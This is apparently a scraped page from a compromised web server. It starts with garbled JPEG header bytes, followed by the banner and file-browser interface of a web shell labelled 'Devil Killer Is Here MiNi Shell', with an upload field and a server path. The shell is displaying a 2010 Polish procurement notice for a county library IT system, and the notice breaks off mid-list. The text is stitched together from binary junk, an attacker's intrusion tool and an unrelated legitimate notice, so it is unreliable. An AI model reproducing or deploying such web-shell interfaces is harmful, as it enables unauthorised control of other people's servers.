JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100830/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100830/234655-N-2010.html

<p class="kh_header"><b>Puławy: Dostawa systemu informatycznego wraz z niezbędnym sprzętem komputerowym oraz dostawa PIAPów (telecentra i infomaty)</b><br>
<b>Numer ogłoszenia: 234655 - 2010; data zamieszczenia: 30.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Puławski , Aleja Królewska 19, 24-100 Puławy, woj. lubelskie, tel. 081 886 11 36.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pulawypz.e-bip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa systemu informatycznego wraz z niezbędnym sprzętem komputerowym oraz dostawa PIAPów (telecentra i infomaty).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest dostawa i wdrożenie systemu informatycznego wraz z niezbędnym sprzętem komputerowym oraz dostawa PIAP-ów (telecentra i infomaty) celem realizacji projektu pn. Stworzenie systemu informatycznego łączącego biblioteki publiczne z terenu powiatu puławskiego dofinansowanego z Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007 - 2013 w ramach Działania 4.1 Społeczeństwo informacyjne nr umowy: 09/09-UDA-RPLU.04.01.00-06-024/09-00-0240. Przedmiot zamówienia obejmuje: -wyposażenie 11 placówek bibliotecznych w niezbędny sprzęt komputerowy i oprogramowanie biblioteczne, -połączenie bibliotek w sieci pracujących w ramach zintegrowanego centralnie zarządzanego systemu z węzłem głównym w Starostwie Powiatowym w Puławach, -utworzenie centralnej bazy danych - katalogu zbiorów 11 bibliotek oraz udostępnienie go czytelnikom w Internecie, -uruchomienie automatycznych rejestracji wypożyczeń i zwrotów w 11 placówkach bibliotecznych, -utworzenie 11 telecentrów w bibliotekach (PIAP), -stworzenie dwóch pasywnych punktów dostępu do Internetu - infomaty, -utworzenie strony www projektu umożliwiającej korzystanie z systemu bibliotecznego oraz zawierającej informację o charakterze edukacyjnym, turystycznym i kulturalnym. W ramach zadania zostanie dostarczone i wdrożone oprogramowanie biblioteczne (licencja z prawem do użytkowania przez Zamawiającego oraz gminy biorące udział w projekcie tj. wszystkie gminy z terenu Powiatu Puławskiego oprócz Miasta Puławy) oraz sprzęt teleinformatyczny i wyposażenie biurowe wraz z niezbędnym oprogramowaniem: -serwery - szt. 2, -zestawy komputerowe z oprogramowaniem - szt. 39, -drukarki do drukowania kart czytelników - szt. 2 wraz kartami PVC - szt. 11 000, -komputery przenośne (notebooki) - szt. 3, -drukarki laserowe - szt. 12, -urządzenia wielofunkcyjne - szt. 10, -sprzęt sieciowy (routery, przełączniki aktywne, szafy krosownicze, zasilacze awaryjne, patchpanele, itp.), -projektory i ekrany - szt. 11, -czytniki kodów kreskowych - szt. 16, -telefony VOIP - szt. 12, -infomaty - szt. 2, -stanowisko komputerowe (meble) - szt. 21, Oprogramowanie biblioteczne spełniające m.in. następujące funkcje: - katalog centralny obsługujący 11 bibliotek w trybie online, - rozmiar bazy danych min. 500 000 woluminów , 100 000 czytelników, - współpraca z czytnikiem kodów paskowych, - odczyt kodów kreskowych, - współpraca z drukarką kart czytelnika, - obsługa katalogowania z możliwością korzystania z baz danych BN (import przewodnika bibliograficznego BN), - nadawanie uprawnień dla poszczególnych stanowisk, - relacyjne słowniki haseł przedmiotowych, - centralne gromadzenie dzieł zwartych, - wyszukiwanie zbiorów, - opracowanie wszystkich typów zbiorów, - udostępnienie katalogu na WWW z wyszukiwaniem i rezerwacją zdalną, - możliwość importu baz danych innych systemów bibliotecznych, - platforma Windows/Linux, struktura klient - serwer, - klient protokołu Z39.50 (kompatybilność z innymi systemami bibliotecznymi np. Biblioteki Miejskiej w Puławach), - wypożyczalnia, - skontrum, - gromadzenie, - magazyn, - obsługa min. 20 stanowisk komputerowych z możliwością rozszerzenia do 100, - moduły dodatkowe np. dla dzieci, studentów, wielojęzyczne, - możliwość jednorazowego, automatycznego przeniesienie bazy opisów bibliogra-ficznych z systemu MAK, Libra przy uruchomieniu systemu. Szczegółowy zakres zamówienia zostanie określony w Specyfikacji Istotnych Warunków Zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 48.16.00.00-7, 48.16.10.00-4, 30.20.00.00-1, 30.21.30.00-5, 30.21.31.00-6, 30.21.61.30-6, 30.23.21.10-8, 48.82.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca dopuszczony przez Zamawiającego do udziału w postępowaniu wniesie, przed upływem terminu składania ofert wadium: 5 000 zł (słownie: pięć tysięcy złotych). 2. Wadium może być wnoszone w jednej lub kilku następujących formach określonych w art. 45 ust. 6 ustawy. 3. Wadium wniesione w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: 62102032190000910200121392 z dopiskiem Dostawa systemu informatycznego wraz z niezbędnym sprzętem komputerowym oraz dostawa PIAPów (telecentra i infomaty). Wadium uważa się za wniesione w terminie, jeżeli kwota wadium znajdzie się na rachunku bankowym Zamawiającego przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona niezwłocznej oceny spełniania warunku na podstawie złożonego wraz z wnioskiem o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia oświadczenia. Warunki będą oceniane według kryterium spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia Wykonawca winien wykazać, że: w okresie ostatnich trzech lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej trzy dostawy o wartości co najmniej 500 000 PLN brutto każda (w przypadku podania wartości w innych walutach zostanie ona przeliczona na PLN według średniego kursu NBP na dzień ukazania się ogłoszenia w Biuletynie Zamówień Publicznych) polegające na dostawie i wdrożeniu informatycznego systemu bibliotecznego lub dostawie i wdrożeniu informatycznego systemu bibliotecznego wraz z niezbędnym sprzętem komputerowym. Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń przy zastosowaniu kryterium spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona niezwłocznej oceny spełniania warunku na podstawie złożonego wraz z wnioskiem o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia oświadczenia. Warunki będą oceniane według kryterium spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca winien wykazać dysponowanie co najmniej siedmioma osobami posiadającymi niezbędną wiedzę i doświadczenie w zakresie wdrażania informatycznego systemu bibliotecznego w tym: a) Kierownik Projektu - 1 osoba, o następujących kwalifikacjach i doświadczeniu: - wykształcenie wyższe, - posiadanie ważnego certyfikatu PRINCE2, lub PMI, lub IPMA, lub PMP lub równoważnego, - kierowanie, w okresie ostatnich trzech lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia, co najmniej jednym wdrożeniem informatycznego systemu bibliotecznego, którego wartość zamówienia wynosiła co najmniej 500 000 PLN brutto (w przypadku podania wartości w innych walutach zostanie ona przeliczona na PLN według średniego kursu NBP na dzień ukazania się ogłoszenia w Biuletynie Zamówień Publicznych), b) Specjalista ds. programowania/analityk - 2 osoby, o następujących kwalifikacjach i doświadczeniu: - wykształcenie wyższe informatyczne, - doświadczenie w konwertowaniu baz danych z co najmniej 2 różnych systemów bibliotecznych, potwierdzone udziałem w okresie ostatnich trzech lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia, w co najmniej 1 zamówieniu, którego przedmiotem była konwersja min. 3 baz danych z systemu uprzednio używanego przez odbiorcę systemu bibliotecznego, do dostarczonego przez Wykonawcę systemu bibliotecznego. c) Specjalista ds. wdrożeń - 4 osoby, o następujących kwalifikacjach i doświadczeniu: - wykształcenie wyższe, - doświadczenie w zakresie wdrażania informatycznego systemu bibliotecznego, potwierdzone udziałem, w okresie ostatnich trzech lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia, w co najmniej 1 zamówieniu, którego przedmiotem było wdrożenie informatycznego systemu bibliotecznego dla minimum 20 operatorów (bibliotekarzy). Zamawiający nie dopuszcza łączenia przez jedną osobę dwóch lub więcej funkcji wskazanych w ppkt. od a do c. Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń przy zastosowaniu kryterium spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona niezwłocznej oceny spełniania warunku na podstawie złożonego wraz z wnioskiem o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia oświadczenia. Warunki będą oceniane według kryterium spełnia- nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>1. Zamawiający zaprosi do składania ofert pięciu wykonawców. 2. Jeżeli liczba Wykonawców, którzy złożyli wniosek o dopuszczenie do udziału w postępowaniu i spełniają warunki udziału w postępowaniu nie przekroczy pięciu, Zamawiający zaprosi do złożenia ofert wszystkich Wykonawców, którzy spełniają warunki udziału w postępowaniu. 3. Jeżeli liczba Wykonawców, którzy złożyli wniosek o dopuszczenie do udziału w postępowaniu i spełniają warunki udziału w postępowaniu będzie większa niż pięciu, Zamawiający zaprosi do składania ofert Wykonawców, którzy otrzymali najwyższą ocenę spełniania warunków udziału w postępowaniu. 4. Zamawiający określa następujące zasady punktacji spełniania warunków udziału w postępowaniu: a) Wykonawca, który spełni warunki udziału w postępowaniu w sposób określony w ogłoszeniu o zamówieniu punkt III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW niniejszego ogłoszenia otrzyma 80 pkt; b) Wykonawca, który wykaże się, w okresie ostatnich trzech lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia, należytą realizacją dostaw informatycznego systemu bibliotecznego lub dostaw informatycznego systemu bibliotecznego wraz z niezbędnym sprzętem komputerowym, których wartość przekracza kwotę 700 000 PLN brutto (w przypadku podania wartości w innych walutach zostanie ona przeliczona na PLN według średniego kursu NBP na dzień ukazania się ogłoszenia w Biuletynie Zamówień Publicznych) otrzyma dodatkowo 2 pkt za każdą z dostaw spełniających ww. kryterium, nie więcej jednak niż 6 dodatkowych pkt; c) Wykonawca, który wykaże się, w okresie ostatnich trzech lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia, należytą realizacją dostaw informatycznego systemu bibliotecznego lub dostaw informatycznego systemu bibliotecznego wraz z niezbędnym sprzętem komputerowym, w ilości większej niż 3 o wartości min. 500 000 zł brutto każda (w przypadku podania wartości w innych walutach zostanie ona przeliczona na PLN według średniego kursu NBP na dzień ukazania się ogłoszenia w Biuletynie Zamówień Publicznych) otrzyma dodatkowo 2 pkt za każdą z dostaw, nie więcej jednak niż 4 dodatkowe pkt; d) Wykonawca, który wykaże się dysponowaniem osobami zdolnymi do wykonania zamówienia o kwalifikacjach i doświadczeniu określonych w ogłoszeniu o zamówieniu punkt III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW podpunkt III.3.4) Osoby zdolne do wykonania zamówienia lit. b - c w ilości większej niż siedem, otrzyma dodatkowo 2 pkt za każdą dodatkową osobę, nie więcej jednak niż 6 dodatkowych punktów, e) Wykonawca, który wykaże się dysponowaniem przez osoby określone w ogłoszeniu o zamówieniu punkt III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW podpunkt III.3.4) Osoby zdolne do wykonania zamówienia lit. b - c doświadczeniem z zakresu wdrażania projektu informatycznego zgodnie z metodyką PRINCE2, lub PMI, lub IPMA, lub PMP lub równoważną potwierdzonej stosownym certyfikatem, w ilości większej niż jedna, otrzyma dodatkowo 2 pkt za każdą dodatkowę osobę, nie więcej jednak niż 4 dodatkowe punkty. 5. Wykonawcy będą oceniani punktowo w zakresie oceny spełniania warunków udziału w postępowaniu tylko i wyłącznie jeśli liczba oferentów przekroczy pięciu, na warunkach określonych w ust. 4. Jeżeli dwóch lub więcej Wykonawców uzyska jednakową liczbę punktów uprawniającą do zaproszenia do kolejnego etapu postępowania, zostaną zaproszeni wszyscy wykonawcy z najlepszym wynikiem, nawet jeżeliby to prowadziło do przekroczenia przewidywanej w ogłoszeniu liczby wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokona się wyboru Wykonawcy polegające na:
1)	zmianie rozwiązań technicznych wykonania zamówienia: 
a) na wniosek Wykonawcy, za zgodą Zamawiającego w trakcie realizacji zamówienia, mogą być dokonywane zmiany rozwiązań technicznych wykonywania zamówienia, dopuszcza się je tylko w przypadku gdy, proponowane przez niego rozwiązanie jest równorzędne lub lepsze funkcjonalnie od tego, jakie przewiduje SIWZ, a Wykonawca nie będzie żądał zwiększenia wynagrodzenia z tytułu tych zmian, powyższe zmiany nie mogą zmieniać terminu zakończenia robót,
b) w uzasadnionych przypadkach, gdy realizacja zamówienia zgodnie z SIWZ powodowałoby wadliwe wykonanie przedmiotu umowy dopuszcza się wprowadzenie zmian bez zmiany terminu zakończenia robót,
c)w przypadku, gdy z punktu widzenia Zamawiającego zachodzi potrzeba zmiany rozwiązań technicznych nie przewidzianych w umowie, sporządza on protokół konieczności; zmiany techniczne  mogą powodować zmianę  terminu zakończenia zamówienia podstawowego.
2) zmianie terminu zakończenia zamówienia podstawowego, gdy: 
a) zmiana będzie wynikała z przyczyn leżących po stronie Zamawiającego lub po stronie gminy biorącej udział w realizacji zamówienia, a w szczególności z przyczyn technicznych,
b) zmiana będzie wynikała z udokumentowanych nie zawinionych przyczyn leżących po stronie Wykonawcy. 
3)	zmianie dotyczącej zakresu robót i wynagrodzenia:
a)	jeżeli wystąpią okoliczności powodujące zmniejszenie zakresu przedmiotu zamówienia; w przypadku zmniejszenia zakresu przedmiotu zamówienia przez Zamawiającego, wynagrodzenie należne Wykonawcy za wykonane zamówienie pozostaje w takim stosunku do umownego wynagrodzenia, w jakim wykonane zamówienie pozostaje do całości zamówienia określonego umową;
b)	jeżeli konieczność wprowadzenia takiej zmiany jest skutkiem zaprzestania produkcji albo niedostępności na rynku danego materiału lub zmiany przepisów prawa,

4)	zmianie osobowej: zmiana osób przy pomocy, których Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone we wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia lub zmiana - za zgodą Zamawiającego, podwykonawców nie wskazanych w ofercie (lub zakresu wskazanego w ofercie jako planowany do powierzenia podwykonawcom); zmiana taka nie wymaga aneksu do umowy i może być przeprowadzona przy zachowaniu procedury zatwierdzenia podwykonawców wynikającej z przepisów prawa i SIWZ,

5) zmianie warunków płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych Instytucji Zarządzającej dotyczących realizacji projektu,
6)  zmianie spowodowanej wystąpieniem siły wyższej, czyli zdarzenia, którego Strony nie mogły przewidzieć i któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwia Wykonawcy wykonanie w części lub całości jego zobowiązań;
